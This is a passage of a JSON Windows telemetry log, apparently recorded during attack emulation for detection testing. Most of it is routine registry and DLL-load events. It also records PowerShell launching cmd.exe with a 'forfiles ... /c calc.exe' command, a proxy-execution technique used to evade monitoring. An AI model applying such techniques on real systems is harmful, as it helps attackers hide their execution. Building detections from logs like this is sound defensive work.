"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570", + "registry_value": "W32:0000000000040570", + "timestamp": 131883574014320000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883574014320000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "image_load", + "image_name": "msctf.dll", + "image_path": "C:\\Windows\\System32\\msctf.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014320000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "dwmapi.dll", + "image_path": "C:\\Windows\\System32\\dwmapi.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014320000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883574014320000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883574014320000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883574014320000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "image_load", + "image_name": "TextInputFramework.dll", + "image_path": "C:\\Windows\\System32\\TextInputFramework.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014400000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "CoreUIComponents.dll", + "image_path": "C:\\Windows\\System32\\CoreUIComponents.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014400000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "CoreMessaging.dll", + "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014400000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014400000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "WinTypes.dll", + "image_path": "C:\\Windows\\System32\\WinTypes.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014400000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "WinTypes.dll", + "image_path": "C:\\Windows\\System32\\WinTypes.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014400000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014490000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574014490000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014490000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014590000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "registry", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883574014590000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "ndfapi.dll", + "image_path": "C:\\Windows\\System32\\ndfapi.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014590000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014590000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "wdi.dll", + "image_path": "C:\\Windows\\System32\\wdi.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014590000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014590000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "duser.dll", + "image_path": "C:\\Windows\\System32\\duser.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014660000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "xmllite.dll", + "image_path": "C:\\Windows\\System32\\xmllite.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014700000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "atlthunk.dll", + "image_path": "C:\\Windows\\System32\\atlthunk.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014750000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", + "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + "registry_value": "Journal", + "timestamp": 131883574014940000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", + "registry_value": "Render", + "timestamp": 131883574014940000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2", + "registry_value": "W32:00000000000305D2", + "timestamp": 131883574015119984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883574015119984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", + "registry_value": "S-1-5-21-2047549730-3016700585-885829632-1000", + "timestamp": 131883574015119984, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", + "registry_value": "pcalua.exe", + "timestamp": 131883574015119984, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\SequenceNumber", + "registry_value": "SequenceNumber", + "timestamp": 131883574015119984, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", + "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + "registry_value": "Journal", + "timestamp": 131883574015270000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", + "registry_value": "Render", + "timestamp": 131883574015270000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574015440000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574015440000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574015440000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574015440000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574015440000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574015440000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574019560000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2", + "registry_value": "W32:00000000000305D2", + "timestamp": 131883574019730000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "process", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "subtype": "terminate", + "timestamp": 131883574019820000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "registry", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", + "registry_value": "pcalua.exe", + "timestamp": 131883574019820000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574019820000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883574019920000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883574019920000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883574020000000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883574020000000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883574020000000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "process", + "pid": 3920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883574020040000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5532, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883574020110000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5532, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574020100000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5532, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574020100000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5532, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574020100000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5532, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574020100000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" + }, + { + "event_type": "file", + "file_name": "PCALUA.EXE-5EB8CBC1.pf", + "file_path": "C:\\Windows\\Prefetch\\PCALUA.EXE-5EB8CBC1.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883574020100000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5532, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574020100000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" + }, + { + "event_type": "process", + "pid": 5532, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883574020180000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2", + "registry_value": "W32:00000000000305D2", + "timestamp": 131883574020360000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883574020360000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5004, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883574020810000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5004, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574020810000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5004, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574020810000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5004, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574020810000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5004, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574020810000, + "unique_pid": 